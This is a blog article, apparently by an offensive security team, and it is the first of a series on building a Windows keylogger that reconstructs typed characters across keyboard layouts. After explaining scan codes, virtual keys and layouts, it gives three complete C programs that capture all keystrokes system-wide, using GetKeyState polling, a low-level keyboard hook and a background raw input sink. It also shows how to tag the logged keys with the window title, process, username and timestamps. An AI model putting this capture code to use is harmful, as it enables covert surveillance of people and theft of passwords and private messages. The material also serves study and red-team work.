Writing a decent win32 keylogger [1/3]

Written by Martin Balc'h - 21/12/2023 - in Tools, System

In this series of articles, we talk about the ins and outs of building a keylogger for Windows that supports all keyboard layouts and reconstructs Unicode characters correctly regardless of the language (excluding those using input method editors).

In the first part, after a brief introduction to the concepts of scan codes, virtual keys, characters and glyphs, we describe three different ways to capture keystrokes (GetKeyState, SetWindowsHookEx, GetRawInputData) and the differences between those techniques.

In the second part, we detail how Windows stores keyboard layout information in the kbd*.dll files and how to parse them.

In the third and last part, we go through the process of using the extracted information to convert scan codes into characters and all the tricky cases presented by different layouts, such as ligatures, dead keys, extra shift-states and SGCAPS.
Finally, we present our methodology to test and validate our reconstruction: a testing tool automates the injection of scan codes and retrieves the reference text produced by Windows, which we then compare with our reconstructed text.


Introduction

One of the responsibilities of Synacktiv's development team is to build and maintain offensive security tooling used by other departments during their engagements. In addition to our main projects such as KRAQOZORUS, OURSIN, DISCONET and LEAKOZORUS, we also try to fulfill smaller "R&D requests" that may be of use during specific missions.

In today's article, we will focus on such a request: building a keylogger targeting Windows that is able to properly reconstruct the characters typed, whichever keyboard layout and language are in use on the target system.

Which, as it turns out, is not as straightforward as you might think.

Key concepts and terminology

Before we start, it is important to introduce a few concepts such as scan codes, virtual keys, characters, glyphs and layouts.

Scan codes

In the beginning were scan codes. They are single-byte or multi-byte values produced by the keyboard firmware and are independent of the keyboard layout. Here are a few example values for a standard ANSI US keyboard:

Key      Scan code    Key            Scan code
ESCAPE   0x01         R              0x13
1        0x02         ENTER          0x1C
2        0x03         NUMPAD_ENTER   0xE0 0x1C
Q        0x10         LEFT CONTROL   0x1D
W        0x11         RIGHT CONTROL  0xE0 0x1D
E        0x12         PAUSE          0xE1 0x1D

Multi-byte scan codes always start with 0xE0, 0xE1 or 0xE2 and are sometimes referred to as “extended” scan codes. In the previous example, you can see they can serve as a way to distinguish between the left control key and the right control key.

The top bit of the scan code indicates if the key is pressed (0) or released (1). When a key is pressed, we call it a make code and when it is released, it’s called a break code. So let’s say we typed “ctrl+r”, the following scan codes would be received:

0x1D    # left control is pressed
0x13    # R is pressed
0x93    # R is released
0x9D    # left control is released
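The make/break rule and the prefix bytes described above can be illustrated with a small decoder. This is only a sketch: the sc_event type and the decode_scan_code function are hypothetical names invented for this example, and it assumes that a prefix byte is followed by exactly one code byte, which does not cover longer sequences.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper type for this sketch (not part of any Windows API). */
typedef struct {
    uint8_t prefix;   /* 0x00 if none, else 0xE0, 0xE1 or 0xE2 */
    uint8_t code;     /* scan code with the top bit cleared */
    bool    released; /* true for a break code, false for a make code */
} sc_event;

/*
 * Decode one key event from a raw scan code byte stream.
 * Returns the number of bytes consumed, or 0 if the buffer is too short.
 * Assumption: a prefix byte is followed by exactly one code byte.
 */
size_t decode_scan_code(const uint8_t *buf, size_t len, sc_event *out)
{
    size_t i = 0;

    if (len == 0)
        return 0;

    out->prefix = 0;
    if (buf[0] == 0xE0 || buf[0] == 0xE1 || buf[0] == 0xE2) {
        if (len < 2)
            return 0;           /* prefix without its code byte */
        out->prefix = buf[0];
        i = 1;
    }

    out->released = (buf[i] & 0x80) != 0;   /* top bit set: break code */
    out->code     = buf[i] & 0x7F;          /* remaining 7 bits: the key */
    return i + 1;
}
```

Fed with the four bytes of the "ctrl+r" example, this decoder yields 0x1D pressed, 0x13 pressed, 0x13 released and 0x1D released.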

More information on scan codes can be found here.

Layouts

Windows allows you to set up the system language and one or more input languages. Input language settings impact the locale, date and time formats and, more importantly for our purposes, keyboard layouts. Note that Windows may offer multiple layouts for a given language. Here is the list of French layouts:

  • French (Legacy, AZERTY)
  • French (Standard, AZERTY)
  • French (Standard, BÉPO, third-party)
  • and also French for other countries like Belgium, Canada, Switzerland, etc.

Keyboard layouts contain information about how to convert scan codes into virtual keys, and then into characters that can be displayed. We will describe their internal structures in depth in the second part of this series. You can explore all the keyboard layouts supported by Windows here.

Virtual keys

Virtual key codes are used by Windows to identify keyboard keys in a language-independent manner. There are 256 virtual key codes and the table can be found here. Let’s say we press the key ‘A’ on a French standard ISO 105 keyboard, first with the fr-FR layout (AZERTY), then with the en-US layout (QWERTY). We would get the same scan code, but it would result in a different virtual key code.

locale  layout     scan code  virtual key
fr-FR   kbdfr.dll  0x10       VK_A (0x41)
en-US   kbdus.dll  0x10       VK_Q (0x51)

Characters and glyphs

In the context of this article, we call characters Unicode code points encoded as UTF-16-LE. Glyphs are the visual representation of one or more Unicode characters, and depend on the font used for display. An interesting case is when multiple Unicode characters are represented by a single glyph: this is called a ligature.
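To make the notion of a UTF-16 encoded code point concrete, here is a minimal sketch of how one code point maps to one or two 16-bit code units. The function name utf16_encode is hypothetical and only serves this illustration; the byte order (little endian) only matters once the units are written to memory or to a file.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Encode one Unicode code point as UTF-16 code units.
 * Returns the number of units written (1 or 2), or 0 for an invalid
 * code point (a surrogate value or anything above U+10FFFF).
 */
size_t utf16_encode(uint32_t cp, uint16_t out[2])
{
    if (cp >= 0xD800 && cp <= 0xDFFF)
        return 0;                       /* reserved for surrogates */
    if (cp > 0x10FFFF)
        return 0;                       /* outside the Unicode range */

    if (cp < 0x10000) {
        out[0] = (uint16_t)cp;          /* fits in a single unit */
        return 1;
    }

    cp -= 0x10000;                      /* 20 bits left to split */
    out[0] = (uint16_t)(0xD800 | (cp >> 10));    /* high surrogate */
    out[1] = (uint16_t)(0xDC00 | (cp & 0x3FF));  /* low surrogate */
    return 2;
}
```

For instance, U+00E9 (é) fits in the single unit 0x00E9, while U+1F600 needs the surrogate pair 0xD83D 0xDE00.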

Now that we got all that out of the way, let’s see how we can go about recording keystrokes.

Recording keystrokes

While there are quite a few ways to record keystrokes, we will only focus on well-known user-land techniques in this article. All the following code snippets call the same function, process_kbd_event, which we define as follows:

void process_kbd_event(
    uint8_t sc,         // (virtual) scan code
    bool    e0,         // is the E0 extended flag set?
    bool    e1,         // is the E1 extended flag set?
    bool    keyup,      // is the event a key press (0) or release (1)
    uint8_t vk          // virtual key associated to the key event
);

This is where we will handle all the processing that follows the capture of key presses, including the reconstruction of character streams.
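Until the reconstruction logic is in place, a placeholder body for this function is handy to check what each capture technique actually reports. The sketch below simply logs every event as one text line; format_kbd_event is a hypothetical helper introduced for this example and the output format is arbitrary.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical helper: render one keyboard event as a single text line. */
int format_kbd_event(char *buf, size_t len,
                     uint8_t sc, bool e0, bool e1, bool keyup, uint8_t vk)
{
    return snprintf(buf, len, "%s sc=%s0x%02X vk=0x%02X",
                    keyup ? "up" : "down",
                    e0 ? "E0 " : (e1 ? "E1 " : ""),
                    (unsigned)sc, (unsigned)vk);
}

/* Placeholder body: log the event instead of reconstructing characters. */
void process_kbd_event(uint8_t sc, bool e0, bool e1, bool keyup, uint8_t vk)
{
    char line[64];

    format_kbd_event(line, sizeof line, sc, e0, e1, keyup, vk);
    puts(line);
}
```

Keeping the formatting in a separate function makes it easy to redirect the output to a file or a buffer later on.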

GetKeyState

The first technique we will describe uses the function GetKeyState, which is provided by user32.dll and defined in winuser.h. It retrieves the current state of a specified virtual key.

SHORT GetKeyState(int nVirtKey);

This function works at a higher level (virtual keys) than the two following techniques, which work at the scan code level. However, we can use the function MapVirtualKeyA to get the scan code that originated the virtual key press or release. To record keystrokes with this function, you need to call it for all 256 virtual key values, keep the resulting states in memory, then call it again a bit later and compare the new states with the saved ones. Whenever a state changes, it means a key was pressed or released. You could also use GetKeyboardState or GetAsyncKeyState to achieve the same result. Here is a working example snippet to capture keystrokes with GetKeyState:

#include <windows.h>
#include <stdbool.h>
#include <stdint.h>
#include <string.h>

void process_kbd_event(uint8_t sc, bool e0, bool e1, bool keyup, uint8_t vk);

// we start by defining a function to retrieve all virtual key states
void get_kb_state(short kbs[256])
{
    for(int i=0; i<256; i++)
        kbs[i] = GetKeyState(i);
}

int main()
{
    short kbs_last[256] = {0};
    get_kb_state(kbs_last);

    while(1)
    {
        short kbs[256] = {0};
        get_kb_state(kbs);

        for(int i=0; i<256; i++)
            if(kbs[i] != kbs_last[i])
            {
                // the state of the virtual key with value "i" changed
                // get a "virtual scan code" for this virtual key
                int vsc = MapVirtualKeyA(i, MAPVK_VK_TO_VSC_EX);
                int e0 = ((vsc >> 8) & 0xff) == 0xe0;   // e0 prefix?
                int e1 = ((vsc >> 8) & 0xff) == 0xe1;   // e1 prefix?
                int sc = vsc & 0xff;                    // keep only the scan code byte
                int up = (kbs[i] & 0x8000) == 0;        // high-order bit set means the key is down

                process_kbd_event(sc, e0, e1, up, i);
            }

        memcpy(kbs_last, kbs, sizeof(kbs_last));
        Sleep(5);
    }
}

Note: In order not to consume too much CPU, we insert a sleep of 5 milliseconds. This value can be increased or lowered as desired, but keep in mind that if a key is pressed and released in less time than the polling interval, the program will miss the event!

Note: working with virtual keys instead of scan codes has a side effect that requires additional code: the distinction between left, right and undifferentiated modifier keys such as CONTROL, SHIFT and ALT. For each of these, Windows has three virtual keys. For instance, the generic VK_CONTROL is triggered by both the left (VK_LCONTROL) and right (VK_RCONTROL) control keys. The same is true for VK_MENU (alt key) and VK_SHIFT (shift key). So with the sample capture code, a press on a control (or alt or shift) key will trigger two process_kbd_event calls: one for the generic virtual key and one for the ‘handed’ version. You probably want to filter out the generic virtual keys and only process the specific left/right versions.
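Filtering out the generic modifier keys can be as simple as the following sketch. The function name is_generic_modifier is hypothetical, and the three constants are redefined under local names (with the values winuser.h gives to VK_SHIFT, VK_CONTROL and VK_MENU) only so that the snippet builds without windows.h; real code would use the winuser.h names directly.

```c
#include <stdbool.h>
#include <stdint.h>

/* Values of the generic modifier virtual keys as defined in winuser.h,
 * redefined under local names so the sketch builds without windows.h. */
enum {
    SKETCH_VK_SHIFT   = 0x10,   /* VK_SHIFT   */
    SKETCH_VK_CONTROL = 0x11,   /* VK_CONTROL */
    SKETCH_VK_MENU    = 0x12    /* VK_MENU (alt key) */
};

/* Returns true for the undifferentiated modifier keys, which duplicate
 * the event already reported for the left/right specific virtual key. */
bool is_generic_modifier(uint8_t vk)
{
    return vk == SKETCH_VK_SHIFT
        || vk == SKETCH_VK_CONTROL
        || vk == SKETCH_VK_MENU;
}
```

In the polling loop, one possible use is to skip the call to process_kbd_event whenever is_generic_modifier(i) returns true.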

SetWindowsHookEx

Another technique that can be used to retrieve key presses is the use of a “global Windows hook”. There are many types of hooks you can set up with SetWindowsHookEx, but we will focus on WH_KEYBOARD_LL. Another hook type, WH_KEYBOARD, also reports key presses but gives less information about them. Here is the prototype of the function:

HHOOK SetWindowsHookExA(
  [in] int       idHook,
  [in] HOOKPROC  lpfn,
  [in] HINSTANCE hmod,
  [in] DWORD     dwThreadId
);

Additionally, Windows hooks can work in two modes: “global” or “thread”. When a hook targets threads that belong to other processes, the callback that processes the events needs to be packaged as a DLL, which is injected into the hooked processes. This is something we would rather avoid.

Low-level hooks, suffixed with “_LL”, can only run in global mode and don't have that restriction, which means you can pass NULL for hmod and 0 for dwThreadId.

To receive the low-level keyboard events, you need to provide a callback and then run a message loop on the thread that installed the hook. Here is a working example of retrieving the key presses with this method:

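#include <windows.h>
#include <stdbool.h>
#include <stdint.h>

void process_kbd_event(uint8_t sc, bool e0, bool e1, bool keyup, uint8_t vk);

// the callback receiving SetWindowsHookEx WH_KEYBOARD_LL events
LRESULT CALLBACK LowLevelKeyboardProc(int code, WPARAM wparm, LPARAM lparm)
{
    // only process the event when code is HC_ACTION, otherwise just forward it
    if(code == HC_ACTION)
    {
        PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT)lparm;
        process_kbd_event((uint8_t)p->scanCode,
            (p->flags & LLKHF_EXTENDED) != 0,
            false,                          // no E1 flag is available here
            (p->flags & LLKHF_UP) != 0,
            (uint8_t)p->vkCode
        );
    }
    return CallNextHookEx(NULL, code, wparm, lparm);
}

int main()
{
    // register the hook
    HHOOK hhkLowLevelKybd = SetWindowsHookEx(WH_KEYBOARD_LL, LowLevelKeyboardProc, NULL, 0);
    if(!hhkLowLevelKybd)
        return -1;
    // pump windows events (GetMessage returns -1 on error, 0 on WM_QUIT)
    MSG msg;
    while(GetMessage(&msg, NULL, 0, 0) > 0)
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    UnhookWindowsHookEx(hhkLowLevelKybd);
    return 0;
}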

GetRawInputData

The final technique we will describe in this article uses the raw input API to retrieve events as keys are pressed. This method requires a little bit more work to set up:

  • you need to register a custom window class with RegisterClassExA first,
  • then you use CreateWindowExA to instantiate a window which will be used to process input events,
  • you can now call RegisterRawInputDevices to select the keyboard usage (0x06) of the generic desktop usage page (0x01), set the RIDEV_INPUTSINK flag and finally specify the target window that will receive the events,
  • then you need a window proc callback that handles WM_INPUT events,
  • you can finally start a message processing loop that uses GetMessage, TranslateMessage and DispatchMessage to start receiving the keyboard events.

The assembled sample code looks like this:

#include <windows.h>
#include <stdbool.h>
#include <stdint.h>

void process_kbd_event(uint8_t sc, bool e0, bool e1, bool keyup, uint8_t vk);

// to receive events for the rawkeyboard data
LRESULT CALLBACK wndproc(HWND window, UINT message, WPARAM wparam, LPARAM lparam)
{
    if(message != WM_INPUT)
        return DefWindowProcA(window, message, wparam, lparam);

    // a RAWINPUT structure is large enough (and properly aligned) for keyboard events
    RAWINPUT raw;
    UINT raw_size = sizeof(raw);

    // GetRawInputData returns (UINT)-1 on failure
    if(GetRawInputData((HRAWINPUT)lparam, RID_INPUT, &raw, &raw_size, sizeof(RAWINPUTHEADER)) != (UINT)-1)
    {
        if(raw.header.dwType == RIM_TYPEKEYBOARD)
        {
            RAWKEYBOARD * rk = &raw.data.keyboard;
            process_kbd_event((uint8_t)rk->MakeCode,
                (rk->Flags & RI_KEY_E0) != 0,
                (rk->Flags & RI_KEY_E1) != 0,
                (rk->Flags & RI_KEY_BREAK) != 0,
                (uint8_t)rk->VKey
            );
        }
    }
    return DefWindowProcA(window, message, wparam, lparam);
}

int main(void)
{
    // define a window class which is required to receive RAWINPUT events
    WNDCLASSEXA wc;
    ZeroMemory(&wc, sizeof(wc));
    wc.cbSize        = sizeof(wc);
    wc.lpfnWndProc   = wndproc;
    wc.hInstance     = GetModuleHandle(NULL);
    wc.lpszClassName = "rawkbd_wndclass";

    // register class
    if(!RegisterClassExA(&wc))
        return -1;

    // create a message-only window
    HWND rawkbd_wnd = CreateWindowExA(0, wc.lpszClassName, NULL, 0, 0, 0, 0, 0, HWND_MESSAGE, NULL, GetModuleHandle(NULL), NULL);
    if(!rawkbd_wnd)
        return -2;

    // setup raw input device sink
    RAWINPUTDEVICE devs = { 0x01 /* generic */, 0x06 /* keyboard */, RIDEV_INPUTSINK, rawkbd_wnd };
    if(RegisterRawInputDevices(&devs, 1, sizeof(RAWINPUTDEVICE)) == FALSE)
        return -3;

    // pump windows events (GetMessage returns -1 on error, 0 on WM_QUIT)
    MSG msg;
    while(GetMessage(&msg, NULL, 0, 0) > 0)
    {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }

    // cleanup
    DestroyWindow(rawkbd_wnd);
    UnregisterClassA(wc.lpszClassName, GetModuleHandle(NULL));
    return 0;
}

I personally prefer this method over the other two since it works at a lower level, avoids global Windows hooks and does not require repeatedly calling a very noticeable function. By the way, you should not trust the RAWKEYBOARD->VKey values, as in some cases they are just wrong (e.g. pressing ALT-GR with a French layout will produce the VK_CONTROL virtual key) while the scan codes are correct.
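Since the virtual key cannot always be trusted, one option is to identify a key by its scan code together with its prefix flags. The sketch below packs them into a single 16-bit value with the prefix in the high byte, mirroring the layout decoded in the GetKeyState sample. The name pack_scan_code is hypothetical, and using this packed value as a key identifier is a choice made for this illustration, not something the raw input API requires.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Pack a scan code and its E0/E1 flags into one 16-bit identifier:
 * the prefix (0xE0, 0xE1 or 0x00) goes in the high byte and the scan
 * code in the low byte. If both flags are set, E0 takes precedence.
 */
uint16_t pack_scan_code(uint8_t sc, bool e0, bool e1)
{
    uint16_t prefix = e0 ? 0xE0 : (e1 ? 0xE1 : 0x00);

    return (uint16_t)((prefix << 8) | sc);
}
```

With this scheme, the left control key becomes 0x001D and the right control key 0xE01D, so the two can be told apart without looking at the virtual key.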

Retrieving the context

We presented three methods to retrieve the key strokes, but in order to reconstruct the character streams, we will need some context information. Additionally, to build a decent keylogger we will need more information such as the current window’s title and process, the current username, timestamps and so on.

The first thing to do is to retrieve a handle to the current active window since it’s the one that will receive the key presses. We then want to retrieve the id of the thread responsible for handling that window, which allows us to call HKL GetKeyboardLayout(DWORD idThread); to retrieve a handle to the keyboard layout used by the active window’s thread. This is how you can do it:

HWND hwnd = GetForegroundWindow();
DWORD thid = GetWindowThreadProcessId(hwnd, NULL);
HKL hkl = GetKeyboardLayout(thid);

To retrieve the process id, you can first use OpenThread() with THREAD_QUERY_INFORMATION and then call GetProcessIdOfThread(), which will return the PID. Alternatively, GetWindowThreadProcessId() can return the PID directly through its second parameter. From the PID, you can get the process name by enumerating running processes with CreateToolhelp32Snapshot, Process32First and Process32Next. Other useful functions to get context information include GetSystemTime(), GetWindowTextA(), GetUserNameA(), etc.

Note: Console programs don’t spawn or run their own graphical window, as it is handled by conhost.exe, so the GetKeyboardLayout() call will fail with this example.

In the next article, we will cover how to parse Windows' keyboard layout DLLs to be able to emulate its scan code to character translation process.